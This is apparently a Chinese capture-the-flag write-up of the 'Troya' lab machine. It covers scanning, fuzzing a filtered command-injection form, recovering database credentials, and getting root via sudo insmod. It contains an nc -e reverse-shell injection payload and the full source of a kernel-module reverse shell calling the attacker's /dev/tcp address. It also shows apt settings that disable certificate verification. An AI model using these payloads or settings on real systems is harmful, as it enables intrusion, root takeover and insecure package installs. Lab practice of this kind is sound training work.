Troya
Troya
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/temp/Troya]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.106:22
Open 192.168.10.106:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b0:b8:5e:2c:41:b8:7c:c8:20:e8:09:ff:7a:6f:ff:9f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGzDvMiSzAKx8LgRHQSGCjYQnRMIvZ3UuVvF2HOjumUrcKqsmhoqrt+r2xW6LWnViU5vLLQJrpwaoBCZPAAamZSQRttehcSjJE9JcBLg2wYC2oiMCBQ1k+QL/Iknc+eTPRVNUDKFMaOUpdbPSX2glm+m6TpA52MRS1OFqZkFsuvwM3D3iRfpB5FecYSe6ihuUaUm/O5z72rJIOsStfkM6Qe8NqnDF0DfD7vSCEiFenNJZT8djSFMQO+Bg8dXwlp6aCb8G9VWQwyjrgxTcDMv20nWvocQcRy2fNO8qC1WPRBZhVl/LjGC9eBjmH1bRHZ3ydcdZChbOa3KrdVkSxpfbF
| 256 3f:44:9f:25:14:99:40:17:e0:07:1f:2e:67:de:78:18 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEbFsO3VVPjlgJmE+s21fQoDV+WrOZALhTfD04WHrfn9cqqR3oLdkHW9DswbrxAS7fmvVN2t9IgXmcaJhXyXJtI=
| 256 c4:0e:93:55:b2:7b:8c:86:c3:e4:6d:01:93:60:d2:b1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOGTvnYiwMPSizNaaMbsjAbUAtRzcmAf71bfuB6mg++I
80/tcp open http syn-ack ttl 64 nginx 1.14.2
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: nginx/1.14.2
| http-methods:
|_ Supported Methods: GET HEAD POST
MAC Address: 08:00:27:DA:71:C5 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/temp/Troya]
└─$ feroxbuster -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html txt php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.10.106/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [html, txt, php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 7l 12w 169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 11l 15w 153c http://192.168.10.106/index.php
200 GET 11l 15w 153c http://192.168.10.106/
扫了一半啥都没有,不扫了。。。。
漏洞发现
踩点
1
2
3
┌──(kali㉿kali)-[~/temp/Troya]
└─$ whatweb http://$IP
http://192.168.10.106 [200 OK] Country[RESERVED][ZZ], HTTPServer[nginx/1.14.2], IP[192.168.10.106], nginx[1.14.2]
1
2
3
4
5
6
7
8
<html>
<body>
<form method="post" action="/index.php">
Enter ip: <input type="text" name="command">
<input type="submit">
</form>
</body>
</html>
测试输入框
输入127.0.0.1:
尝试使用&|;'<>等符号进行测试:
看来存在部分过滤。。。。尝试对其进行模糊测试:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
┌──(kali㉿kali)-[~/temp/Troya]
└─$ ffuf -u http://$IP/index.php -c -w /usr/share/seclists/Fuzzing/alphanum-case.txt -d 'command=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fw 16
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://192.168.10.106/index.php
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/alphanum-case.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : command=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 16
________________________________________________
h [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 60ms]
i [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 64ms]
s [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 72ms]
a [Status: 200, Size: 180, Words: 15, Lines: 12, Duration: 151ms]
:: Progress: [62/62] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
如上测试出来的字符不能利用!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
┌──(kali㉿kali)-[~/temp/Troya]
└─$ ffuf -u http://$IP/index.php -c -w /usr/share/seclists/Fuzzing/alphanum-case-extra.txt -d 'command=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fr "No"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://192.168.10.106/index.php
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/alphanum-case-extra.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : command=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Regexp: No
________________________________________________
+ [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 55ms]
/ [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 79ms]
H [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 89ms]
0 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 124ms]
, [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 137ms]
! [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 156ms]
& [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 180ms]
1 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 192ms]
. [Status: 200, Size: 193, Words: 16, Lines: 13, Duration: 219ms]
3 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 256ms]
2 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 260ms]
- [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 283ms]
4 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 329ms]
5 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 337ms]
( [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 344ms]
) [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 359ms]
6 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 379ms]
7 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 407ms]
8 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 419ms]
9 [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 447ms]
: [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 461ms]
$ [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 495ms]
@ [Status: 200, Size: 193, Words: 16, Lines: 13, Duration: 520ms]
A [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 537ms]
? [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 546ms]
B [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 581ms]
D [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 592ms]
C [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 625ms]
E [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 670ms]
F [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 681ms]
G [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 690ms]
I [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 690ms]
J [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 674ms]
K [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 668ms]
L [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 698ms]
M [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 691ms]
N [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 696ms]
P [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 758ms]
Q [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 764ms]
O [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 785ms]
R [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 751ms]
S [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 807ms]
T [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 805ms]
V [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 784ms]
U [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 797ms]
X [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 838ms]
W [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 847ms]
Z [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 786ms]
Y [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 836ms]
\ [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 816ms]
[ [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 870ms]
b [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 759ms]
_ [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 805ms]
] [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 873ms]
f [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 839ms]
c [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 863ms]
e [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 865ms]
d [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 872ms]
g [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 887ms]
k [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 832ms]
j [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 899ms]
l [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 865ms]
m [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 860ms]
n [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 826ms]
o [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 835ms]
p [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 879ms]
q [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 828ms]
t [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 780ms]
r [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 857ms]
v [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 825ms]
u [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 850ms]
x [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 770ms]
w [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 788ms]
| [Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 728ms]
y [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 817ms]
z [Status: 200, Size: 194, Words: 16, Lines: 13, Duration: 817ms]
[Status: 200, Size: 164, Words: 12, Lines: 12, Duration: 658ms]
:: Progress: [95/95] :: Job [1/1] :: 55 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
可以利用的在这里。。。。。。尝试反弹shell,实战发现&也不行:
1
| nc 192.168.10.107 1234 -e /b?n/b???
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
(remote) www-data@troya:/var/www/html$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Oct 22 2020 .
drwxr-xr-x 3 root root 4096 Oct 22 2020 ..
-rw-r--r-- 1 root root 518 Oct 22 2020 index.php
-rw-r--r-- 1 root root 13 Oct 22 2020 secret.pdf
(remote) www-data@troya:/var/www/html$ cat secret.pdf
cGF6endvcmQK
(remote) www-data@troya:/var/www/html$ cat /etc/passwd | grep sh | cut -d: -f1
root
paul
sshd
hector
helena
(remote) www-data@troya:/var/www/html$ ls -la /home
total 20
drwxr-xr-x 5 root root 4096 Oct 22 2020 .
drwxr-xr-x 18 root root 4096 Oct 22 2020 ..
drwxr-xr-x 2 hector hector 4096 Oct 22 2020 hector
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 helena
drwxr-xr-x 2 paul paul 4096 Oct 22 2020 paul
(remote) www-data@troya:/var/www/html$ cd /home/hector/
(remote) www-data@troya:/home/hector$ ls -la
total 20
drwxr-xr-x 2 hector hector 4096 Oct 22 2020 .
drwxr-xr-x 5 root root 4096 Oct 22 2020 ..
-rw-r--r-- 1 hector hector 220 Oct 22 2020 .bash_logout
-rw-r--r-- 1 hector hector 3526 Oct 22 2020 .bashrc
-rw-r--r-- 1 hector hector 807 Oct 22 2020 .profile
(remote) www-data@troya:/home/hector$ cd ../helena/
(remote) www-data@troya:/home/helena$ ls -la
total 28
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .
drwxr-xr-x 5 root root 4096 Oct 22 2020 ..
-rw-r--r-- 1 helena helena 220 Oct 22 2020 .bash_logout
-rw-r--r-- 1 helena helena 3526 Oct 22 2020 .bashrc
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .local
-rw-r--r-- 1 helena helena 807 Oct 22 2020 .profile
-rw------- 1 helena helena 11 Oct 22 2020 user.txt
(remote) www-data@troya:/home/helena$ cd .local/
(remote) www-data@troya:/home/helena/.local$ ls -la
total 12
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 ..
drwx------ 3 helena helena 4096 Oct 22 2020 share
(remote) www-data@troya:/home/helena/.local$ cd ../../paul/
(remote) www-data@troya:/home/paul$ ls -la
total 24
drwxr-xr-x 2 paul paul 4096 Oct 22 2020 .
drwxr-xr-x 5 root root 4096 Oct 22 2020 ..
-rw------- 1 paul paul 51 Oct 22 2020 .Xauthority
-rw-r--r-- 1 paul paul 220 Oct 22 2020 .bash_logout
-rw-r--r-- 1 paul paul 3526 Oct 22 2020 .bashrc
-rw-r--r-- 1 paul paul 807 Oct 22 2020 .profile
数据库泄露
得到的那个secret.pdf肯定是有用的,看起来怪怪的,看一下是否是加密了:
尝试切换用户,但是未果,发现存在mysql服务,尝试连接一下,发现hector使用密码pazzword可以连接上!!!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
(remote) www-data@troya:/home/paul$ ss -tnlup
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=471,fd=6))
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 [::]:80 [::]:* users:(("nginx",pid=471,fd=7))
tcp LISTEN 0 128 [::]:22 [::]:*
(remote) www-data@troya:/var/www/html$ mysql -u hector -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 39
Server version: 10.3.25-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| yo |
+--------------------+
2 rows in set (0.017 sec)
MariaDB [(none)]> use yo;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [yo]> show tables;
+--------------+
| Tables_in_yo |
+--------------+
| lucky |
+--------------+
1 row in set (0.000 sec)
MariaDB [yo]> select * from lucky;
+----+--------+--------------------+
| id | uzer | pazz |
+----+--------+--------------------+
| 1 | helena | iuyqwejkhdsaiuyewq |
+----+--------+--------------------+
1 row in set (0.000 sec)
MariaDB [yo]> exit
Bye
尝试切换用户:
insmod提权root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
helena@troya:~$ ls -la
total 28
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .
drwxr-xr-x 5 root root 4096 Oct 22 2020 ..
-rw-r--r-- 1 helena helena 220 Oct 22 2020 .bash_logout
-rw-r--r-- 1 helena helena 3526 Oct 22 2020 .bashrc
drwxr-xr-x 3 helena helena 4096 Oct 22 2020 .local
-rw-r--r-- 1 helena helena 807 Oct 22 2020 .profile
-rw------- 1 helena helena 11 Oct 22 2020 user.txt
helena@troya:~$ cat user.txt
pleasestop
helena@troya:~$ sudo -l
Matching Defaults entries for helena on troya:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User helena may run the following commands on troya:
(ALL) NOPASSWD: /usr/sbin/insmod
啥玩意啊这是:
Linux insmod(英文全拼:install module)命令用于载入模块。
Linux有许多功能是通过模块的方式,在需要时才载入kernel。如此可使kernel较为精简,进而提高效率,以及保有较大的弹性。这类可载入的模块,通常是设备驱动程序。
语法
参数说明:
- -f 不检查目前kernel版本与模块编译时的kernel版本是否一致,强制将模块载入。
- -k 将模块设置为自动卸除。
- -m 输出模块的载入信息。
- -o<模块名称> 指定模块的名称,可使用模块文件的文件名。
- -p 测试模块是否能正确地载入kernel。
- -s 将所有信息记录在系统记录文件中。
- -v 执行时显示详细的信息。
- -x 不要汇出模块的外部符号。
- -X 汇出模块所有的外部符号,此为预设置
1
2
3
4
5
6
7
8
9
helena@troya:~$ /usr/sbin/insmod --help
Usage:
insmod [options] filename [args]
Options:
-V, --version show version
-h, --help show this help
helena@troya:~$ /usr/sbin/insmod -V
kmod version 26
+XZ -ZLIB +OPENSSL -EXPERIMENTAL
可以参考:https://book.hacktricks.wiki/zh/linux-hardening/privilege-escalation/linux-capabilities.html?highlight=insmod#cap_sys_module
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// reverse-shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.10.107/2345 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
// call_usermodehelper function is used to create user mode processes from kernel space
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
1
2
3
4
5
6
7
8
// Makefile
obj-m +=reverse-shell.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
Makefile 中每个 make 单词前的空白字符 必须是制表符,而不是空格!
vim set noexpandtab
靶机上面没有make,尝试本地编译上传:
1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/temp/Troya]
└─$ cat -A Makefile
obj-m +=reverse-shell.o$
$
all:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules$
$
clean:$
^Imake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean$
接下来全是试错
make 报错了:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/temp/Troya]
└─$ make
make -C /lib/modules/6.12.25-amd64/build M=/home/kali/temp/Troya modules
make[1]: Entering directory '/home/kali/temp/Troya'
make[1]: *** /lib/modules/6.12.25-amd64/build: No such file or directory. Stop.
make[1]: Leaving directory '/home/kali/temp/Troya'
make: *** [Makefile:4: all] Error 2
说明内核版本不对,需要手动选择内核版本进行攻击。。。。
可参考这位大佬的wp:https://nepcodex.com/2023/01/troya-walkthrough-from-hackmyvm-writeup/
我使用vmware进行操作的,反正只要最后的文件。。。。
1
2
helena@troya:/tmp$ uname -a
Linux troya 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
要安装相同版本内核进行操作。。。。
失败回放
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿kali)-[~]
└─$ cat /etc/apt/sources.list
#
# deb cdrom:[Debian GNU/Linux 10.4.0 _Buster_ - Official amd64 xfce-CD Binary-1 20200509-10:26]/ buster main
#deb cdrom:[Debian GNU/Linux 10.4.0 _Buster_ - Official amd64 xfce-CD Binary-1 20200509-10:26]/ buster main
deb http://deb.debian.org/debian buster main contrib non-free
deb http://security.debian.org/debian-security buster/updates main
deb-src http://security.debian.org/debian-security buster/updates main
deb [check-valid-until=no] https://snapshot.debian.org/archive/debian/20201201T031901Z buster main contrib non-free
deb-src [check-valid-until=no] https://snapshot.debian.org/archive/debian/20201201T031901Z buster main contrib non-free
deb [check-valid-until=no] https://snapshot.debian.org/archive/debian/20201201T031901Z buster/updates main
deb-src [check-valid-until=no] https://snapshot.debian.org/archive/debian/20201201T031901Z buster/updates main
# buster-updates, previously known as 'volatile'
# A network mirror was not selected during install. The following entries
# are provided as examples, but you should amend them as appropriate
# for your mirror of choice.
#
# deb http://deb.debian.org/debian/ buster-updates main
# deb-src http://deb.debian.org/debian/ buster-updates main
# This system was installed using small removable media
# (e.g. netinst, live or single CD). The matching "deb cdrom"
# entries were disabled at the end of the installation process.
# For information about how to configure apt package sources,
# see the sources.list(5) manual.
然后为了绕过时间检查,需要进行下面操作:
在 /etc/apt/apt.conf.d/ 目录下新建一个配置文件(如 99nocheckvalid.conf),并添加以下内容:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali㉿kali)-[~]
└─$ ls -la /etc/apt/apt.conf.d
total 36
drwxr-xr-x 2 root root 4096 Jan 26 2024 .
drwxr-xr-x 8 root root 4096 Jun 27 11:59 ..
-rw-r--r-- 1 root root 399 Sep 20 2023 01autoremove
-r--r--r-- 1 root root 496 Nov 30 2023 02autoremove-postgresql
-rw-r--r-- 1 root root 2164 Sep 10 2022 50apt-file.conf
-rw-r--r-- 1 root root 654 May 21 2023 50command-not-found
-rw-r--r-- 1 root root 91 Nov 26 2023 50kali
-rw-r--r-- 1 root root 182 Jan 8 2023 70debconf
-rw-r--r-- 1 root root 142 Dec 13 2017 80debtags
┌──(kali㉿kali)-[~]
└─$ cd $_
# sudo vim 99nocheckvalid.conf # 文件名规则:建议以数字开头(如 99),确保其在最后加载。
┌──(kali㉿kali)-[/etc/apt/apt.conf.d]
└─$ cat 99nocheckvalid.conf
Acquire::Check-Valid-Until "false";
# sudo vim 99noverifycert.conf
┌──(kali㉿kali)-[/etc/apt/apt.conf.d]
└─$ cat $_
// Do not verify peer certificate
Acquire::https::Verify-Peer "false";
// Do not verify that certificate name matches server name
Acquire::https::Verify-Host "false";
然后apt update使配置生效:
1
2
┌──(kali㉿kali)-[/etc/apt/apt.conf.d]
└─$ sudo apt update
然后下载内核版本:
1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[/etc/apt/apt.conf.d]
└─$ sudo apt install linux-headers-4.19.0-12-amd64 linux-image-4.19.0-12-amd64 build-essential
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package linux-headers-4.19.0-12-amd64
E: Couldn't find any package by glob 'linux-headers-4.19.0-12-amd64'
E: Unable to locate package linux-image-4.19.0-12-amd64
E: Couldn't find any package by glob 'linux-image-4.19.0-12-amd64'
完蛋,不支持这个版本。。。。。
只能找一下现成的了。。。。实在不行就要找群主去要了。。。
最后编译出来再:
1
sudo insmod reverse-shell.ko
即可拿到rootshell。。。。
google hacking
SML为什么不装make!回答我!!!!Look in my eyes, tell me, why? Why?
黄天不负有心人:
todd居然也是这个版本的。。。https://www.cnblogs.com/smoggy1/p/18814849
去瞅瞅这俩靶机!!!!!等我消息,兄弟们!!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@helium:~# find / -name '*make*' 2>/dev/null
/usr/lib/python3/dist-packages/urllib3/packages/backports/makefile.py
/usr/lib/python3/dist-packages/urllib3/packages/backports/__pycache__/makefile.cpython-37.pyc
/usr/lib/systemd/systemd-makefs
/usr/share/cmake
/usr/share/cmake/bash-completion/bash-completion-config.cmake
/usr/share/cmake/bash-completion/bash-completion-config-version.cmake
/usr/share/bash-completion/completions/gnatmake
/usr/share/bash-completion/completions/pmake
/usr/share/bash-completion/completions/automake-1.12
/usr/share/bash-completion/completions/automake-1.14
/usr/share/bash-completion/completions/gmake
/usr/share/bash-completion/completions/colormake
/usr/share/bash-completion/completions/automake-1.13
/usr/share/bash-completion/completions/automake-1.11
/usr/share/bash-completion/completions/makepkg
/usr/share/bash-completion/completions/automake
/usr/share/bash-completion/completions/automake-1.15
/usr/share/bash-completion/completions/gnumake
/usr/share/bash-completion/completions/make
/usr/share/bash-completion/completions/automake-1.10
/usr/share/console-setup/kbdnames-maker
/usr/share/man/man8/systemd-makefs.8.gz
/usr/share/man/man8/systemd-makeswap@.service.8.gz
/usr/share/man/man8/systemd-makefs@.service.8.gz
/usr/share/nano/makefile.nanorc
/usr/share/nano/cmake.nanorc
不愧是同一个sml出的靶机。。。。。。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
root@todd:~# find / -name "*make*" 2>/dev/null
/usr/sbin/make-ssl-cert
/usr/lib/systemd/systemd-makefs
/usr/lib/python3/dist-packages/urllib3/packages/backports/makefile.py
/usr/lib/python3/dist-packages/urllib3/packages/backports/__pycache__/makefile.cpython-37.pyc
/usr/share/cmake
/usr/share/cmake/bash-completion/bash-completion-config.cmake
/usr/share/cmake/bash-completion/bash-completion-config-version.cmake
/usr/share/vim/vim81/ftplugin/cmake.vim
/usr/share/vim/vim81/ftplugin/make.vim
/usr/share/vim/vim81/ftplugin/automake.vim
/usr/share/vim/vim81/syntax/cmake.vim
/usr/share/vim/vim81/syntax/make.vim
/usr/share/vim/vim81/syntax/automake.vim
/usr/share/vim/vim81/indent/cmake.vim
/usr/share/vim/vim81/indent/make.vim
/usr/share/vim/vim81/indent/automake.vim
/usr/share/man/man3/makecontext.3.gz
/usr/share/man/man3/gnu_dev_makedev.3.gz
/usr/share/man/man3/cfmakeraw.3.gz
/usr/share/man/man3/inet_makeaddr.3.gz
/usr/share/man/man3/makedev.3.gz
/usr/share/man/man8/systemd-makefs.8.gz
/usr/share/man/man8/systemd-makeswap@.service.8.gz
/usr/share/man/man8/systemd-makefs@.service.8.gz
/usr/share/man/man8/make-ssl-cert.8.gz
/usr/share/bash-completion/completions/automake-1.14
/usr/share/bash-completion/completions/colormake
/usr/share/bash-completion/completions/automake-1.12
/usr/share/bash-completion/completions/makepkg
/usr/share/bash-completion/completions/pmake
/usr/share/bash-completion/completions/gnatmake
/usr/share/bash-completion/completions/automake-1.10
/usr/share/bash-completion/completions/automake-1.11
/usr/share/bash-completion/completions/automake-1.13
/usr/share/bash-completion/completions/make
/usr/share/bash-completion/completions/gnumake
/usr/share/bash-completion/completions/gmake
